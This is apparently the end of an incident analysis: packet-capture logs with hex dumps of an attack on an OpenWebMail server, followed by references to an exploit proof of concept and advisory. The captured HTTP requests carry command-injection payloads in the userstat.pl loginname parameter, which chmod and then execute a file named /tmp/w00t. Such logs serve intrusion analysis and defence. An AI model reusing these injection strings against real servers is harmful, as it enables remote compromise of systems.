=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.907726 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x899AD808  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.908162 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x899AD808  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.082972 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3244 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8A5FC246  Ack: 0x24D38331  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023103 1991970262

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.089696 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3245 IpLen:20 DgmLen:306 DF
***AP*** Seq: 0x8A5FC246  Ack: 0x24D38331  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023103 1991970262
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65  GET /cgi-bin/ope
6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61  nwebmail/usersta
74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C  t.pl?loginname=|
63 68 6D 6F 64 25 32 30 37 35 35 25 32 30 2F 74  chmod%20755%20/t
6D 70 2F 77 30 30 74 20 48 54 54 50 2F 31 2E 30  mp/w00t HTTP/1.0
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F  ..User-Agent: Mo
7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61  zilla/4.0 (compa
74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B  tible; MSIE 6.0;
20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29   Windows NT 5.1)
0D 0A 48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33  ..Host: 24.2.153
2E 31 36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  .168..Pragma: no
2D 63 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69  -cache..Connecti
6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65  on: close..Conte
6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61  nt-Type: applica
74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D  tion/x-www-form-
75 72 6C 65 6E 63 6F 64 65 64 0D 0A 0D 0A        urlencoded....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.089725 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36280 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24D38331  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970448 763023103

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.160629 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36281 IpLen:20 DgmLen:238 DF
***AP*** Seq: 0x24D38331  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978520 763023103
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 39  ep 2004 19:05:39
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63  no-store..Connec
74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E  tion: close..Con
74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69  tent-Type: appli
63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61 73 63 72  cation/x-javascr
69 70 74 0D 0A 0D 0A 2F 2F 0A                    ipt....//.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.161627 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36282 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x24D383EB  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978521 763023103

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.335709 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3246 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8A5FC344  Ack: 0x24D383EB  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023928 1991978520

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.338169 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3247 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x8A5FC344  Ack: 0x24D383EB  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023928 1991978520

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.339181 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:205 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8AE4D2F5  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763023928 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.339227 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24725205  Ack: 0x8AE4D2F6  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991978698 763023928
TCP Options => NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.342713 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x8A5FC344  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.500442 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:206 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8AE4D2F6  Ack: 0x24725206  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023946 1991978698

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.506647 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:207 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x8AE4D2F6  Ack: 0x24725206  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023946 1991978698
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65  GET /cgi-bin/ope
6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61  nwebmail/usersta
74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C  t.pl?loginname=|
65 78 65 63 25 32 30 2F 74 6D 70 2F 77 30 30 74  exec%20/tmp/w00t
20 48 54 54 50 2F 31 2E 30 0D 0A 55 73 65 72 2D   HTTP/1.0..User-
41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34  Agent: Mozilla/4
2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20  .0 (compatible;
4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77  MSIE 6.0; Window
73 20 4E 54 20 35 2E 31 29 0D 0A 48 6F 73 74 3A  s NT 5.1)..Host:
20 32 34 2E 32 2E 31 35 33 2E 31 36 38 0D 0A 50   24.2.153.168..P
72 61 67 6D 61 3A 20 6E 6F 2D 63 61 63 68 65 0D  ragma: no-cache.
0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  .Connection: clo
73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65  se..Content-Type
3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D  : application/x-
77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F  www-form-urlenco
64 65 64 0D 0A 0D 0A                             ded....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.506676 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32106 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24725206  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978866 763023946

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.577196 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32107 IpLen:20 DgmLen:257 DF
***AP*** Seq: 0x24725206  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991986937 763023946
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 34 37  ep 2004 19:05:47
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 74 65 6E  no-store..Conten
74 2D 4C 65 6E 67 74 68 3A 20 33 0D 0A 43 6F 6E  t-Length: 3..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70  Content-Type: ap
70 6C 69 63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61  plication/x-java
73 63 72 69 70 74 0D 0A 0D 0A 2F 2F 0A           script....//.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.577347 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32108 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x247252D3  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991986937 763023946

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.735138 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:208 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8AE4D3ED  Ack: 0x247252D3  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763024770 1991986937

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.736590 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:209 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x8AE4D3ED  Ack: 0x247252D3  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763024770 1991986937

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.739713 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x8AE4D3ED  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

iii. References

[1]. PoC for OpenWebMail Remote Command Execution (Userstat.pl)
[2]. Gwee - the Generic Web Exploitation Engine
[3]. OpenWebMail Exploit Advisory on hackwire.com